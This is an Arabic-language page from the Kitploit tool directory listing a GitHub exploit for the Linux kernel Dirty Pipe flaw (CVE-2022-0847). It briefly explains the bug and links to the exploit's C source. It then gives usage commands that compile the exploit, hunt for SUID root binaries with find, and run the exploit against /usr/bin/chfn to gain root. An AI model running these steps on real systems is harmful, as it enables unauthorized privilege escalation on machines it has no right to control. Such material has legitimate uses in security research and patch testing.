Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-0847-DirtyPipe-Exploit — CVE-2022-0847-DirtyPipe-Exploit | Kitploit
أدوات/GitHubGitHub/v0wkeep3r/cve-2022-0847-dirtypipe-exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubv0wkeep3r/cve-2022-0847-dirtypipe-exploit

CVE-2022-0847-DirtyPipe-Exploit

CVE-2022-0847-DirtyPipe-Exploit

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
2منذ 4 سنواتلم تتم المراجعة بعد

CVE-2022-0847-DirtyPipe

مقدمة الثغرة

في 7 مارس، نشر الباحث الأمني الأجنبي ماكس كيلرمان مدونة كشف فيها عن ثغرة رفع صلاحيات محلية موجودة في نواة لينكس CVE-2022-0847: https://dirtypipe.cm4all.com/

CVE-2022-0847 هي ثغرة رفع صلاحيات محلية موجودة في نواة لينكس 5.8 والإصدارات الأحدث. باستغلال هذه الثغرة، يمكن للمهاجم الكتابة فوق البيانات في أي ملف قابل للقراءة، وبالتالي رفع صلاحيات المستخدم العادي إلى صلاحيات الجذر (root).

مبدأ ثغرة CVE-2022-0847 مشابه لثغرة CVE-2016-5195 (Dirty Cow)، لكنها أسهل في الاستغلال. أطلق عليها مؤلف الثغرة اسم "Dirty Pipe".

استخدام الـ EXP

الرابط: https://haxx.in/files/dirtypipez.c
المؤلف: Max Kellermann [email protected]

root@kitploit:~
gcc -o exp exploit.c
./exp +x ./exp

# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

./exp /usr/bin/chfn

تنزيل الأداة